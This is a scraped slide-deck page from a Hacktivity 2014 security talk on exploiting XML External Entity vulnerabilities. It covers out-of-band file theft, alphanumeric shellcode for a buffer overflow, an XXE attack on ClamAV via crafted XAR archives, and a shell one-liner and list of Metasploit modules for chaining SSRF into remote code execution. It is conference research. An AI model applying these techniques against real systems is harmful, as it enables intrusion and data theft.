Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

eXploitable Markup Language


Published on

The slide deck from our Hacktivity 2014 presentation about exploiting XML External Entity vulnerabilities.

Published in: Software
  • Be the first to comment

  • Be the first to like this

eXploitable Markup Language

  1. 1. <?xml version=“1.0”?> <DOCTYPE presentation [ <!ENTITY HacktivityLogo SYSTEM “”> ]> <presentation> <logos>&HacktivityLogo; </logos> <title> eXploitable Markup Language </title> <speakers> <speaker Name=“Rajtmár Ákos”> <email></email> </speaker> <speaker Name=“Szakály Tamás”> <email></email> <twitter>@sghctoma</twitter> </speaker> </speakers> </presentaion>
  2. 2. Possible Hacktivity topics How secure are today’s games? Possible vulns in the EventLog subsystem of recent Windows systems. The security of smart houses.
  3. 3. Well known XML attacks XSLT-related XInclude attacks Entity-based attacks • Billion laughs • XXE Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
  4. 4. Lots of XML-related web application attacks. But the web is not the whole world. (not yet, anyway :) ) Won’t show any new XML vulnerabilities. DON’Ts
  5. 5. DOs Show exciting ways to exploit Deal with the client side Deal with XML-derivatives, and files with embedded XML parts There are tons of these. Often people don’t even realize they are dealing with XML Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
  6. 6. XML entities What are “entities” in XML-world? OK, what are “external entities”?
  7. 7. XXE Intro Most basic XXE: include resources App has to display something from the XML
  8. 8. Interesting protocol handlers jar:// extract file from given .jar file:// directory list • php:// with filters (base64 encode a file)
  9. 9. Special type of entity Using % instead of & More flexible Declaration of external DTD Can not be used in XML body XML syntax is not a must DTD conformity Parameter entities
  10. 10. Non XML conform content combine.dtd: <![CDATA[ ]]>
  11. 11. Sending local file content External parameter entity Different protocol handlers FTP, HTTP, FILE Differences in implementation Out-of-Bounds
  12. 12. XXE meets inter-protocol exploitation Requirements Encapsulation Error tolerance Main difficulty: limited character set Let’s check some XML parsers’ badchars Internet Explorer • only ASCII • URL-encodes some char (e.g. space -> %20) • Cuts newlines Visual Studio • URL-encodes every non alphanumeric chars
  13. 13. Trigger BoF via XXE
  14. 14. Alphanum shellcode Restricted to alphanumeric characters UTF-8 too!! Metasploit Framework Encoders: x86/alpha_mixed, x86/alpha_upper Useful options: BufferRegister, AllowWin32SEH
  15. 15. The payload
  16. 16. qB8w Need “jmp esp” with an ASCII-only address 0x77384271 in big endian is qB8w
  17. 17. Installed Pidgin Jabber configured accounts.xml Request external DTD Generating mailer payload Sending malicious content Authenticated as user Inter protocol SMTPloitation
  18. 18. Garmin Training Center + Not bothering with n - Yet not able to evaluate &variables; Possible implementation issue Visual Studio 2012 + Ability to evaluate &variables; - A great fan of URL encoding Permanent fail?
  19. 19. Slight possibility of using Garmin I believe I saw it working Finding another n application Visual Studio can be „controlled” Sending multiple files Delivering more attacks Not at all
  20. 20. XXE the AV! Original idea: .docx vs. virus scanners Grepped ClamAV’s source for “xml” It uses libxml2 to open XAR archives basically an archive format with compressed XML metadata What other AV’s know this format?
  21. 21. AVG Ad-Aware Avast Avira BitDefender DrWeb ESET-NOD32 Emsisoft F-Secure Gdata Kaspersky NANO-Antivirus Qihoo-360 nProtect MicroWorld-eScan EICAR string: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* XARd it, and sent to VirusTotal Besides ClamAV, these can deal with XAR:
  22. 22. There Can Be Only One AVs use XML parsers without knowledge of DTD Except ClamAV • Only recent versions >= 0.98.1 So let’s hack ClamAV!
  23. 23. XAR format
  24. 24. XAR hexdump
  25. 25. PoC Python script to create XARs with custom XML Simple XML with HTTP external entity: Scanned it with clamscan...
  26. 26. ... and it worked!
  27. 27. &Some haxx0r stuff; libxml2 limitation: very strict URI checking for example, no newlines allowed OOB attacks are very-very limited only files without newlines can be stolen. SSRF is our Super Mushroom only GET request only HTTP payload cannot contain non-ASCII chars
  28. 28. Finding suitable exploits cat ~/msf_http.txt |while read line; do grep -q -E -i "443|post|ssl" $line; if[[ $? -ne 0 ]]; then echo $line; fi; done > ~/msf_http_nossl_nopost.txt
  29. 29. linux/http/esva_exec linux/http/dreambox_openpli_shell linux/http/fritzbox_echo_exec linux/http/symantec_web_gateway_lfi linux/http/symantec_web_gateway_pbcontrol linux/http/ddwrt_cgibin_exec multi/http/struts_code_exec multi/http/vtiger_install_rce multi/http/v0pcr3w_exec multi/http/snortreport_exec multi/http/spree_search_exec multi/http/phptax_exec multi/http/gitorious_graph multi/http/familycms_less_exec multi/http/gestioip_exec multi/http/freenas_exec_raw multi/http/ajaxplorer_checkinstall_exec multi/http/spree_searchlogic_exec multi/http/oracle_reports_rce multi/http/mobilecartly_upload_exec unix/http/freepbx_callmenum unix/webapp/cacti_graphimage_exec unix/webapp/awstats_configdir_exec unix/webapp/barracuda_img_exec unix/webapp/invision_pboard_unserialize_exec unix/webapp/basilic_diff_exec unix/webapp/awstats_migrate_exec unix/webapp/google_proxystylesheet_exec unix/webapp/base_qry_common unix/webapp/tikiwiki_graph_formula_exec unix/webapp/mambo_cache_lite unix/webapp/awstatstotals_multisort unix/webapp/openview_connectednodes_exec unix/webapp/php_charts_exec unix/webapp/php_vbulletin_template unix/webapp/freepbx_config_exec unix/webapp/twiki_search unix/webapp/twiki_history unix/webapp/mitel_awc_exec unix/webapp/instantcms_exec unix/webapp/redmine_scm_exec windows/http/sap_configservlet_exec_noauth
  30. 30. Our choice for the demo unix/webapp/freepbx_config_exec
  31. 31. Further research Games that use XML for game saves, network communication • Skyrim • Flight Gear XML metadata • rdf Binary XML parsers • Cwxml • OpenEXI • Exifficient • AgileDelta • Window EventLog format (since Vista) Network Configuration Protocol (NETCONF) XML databases • IBM DB2 • Oracle • MSSQL
  32. 32. THX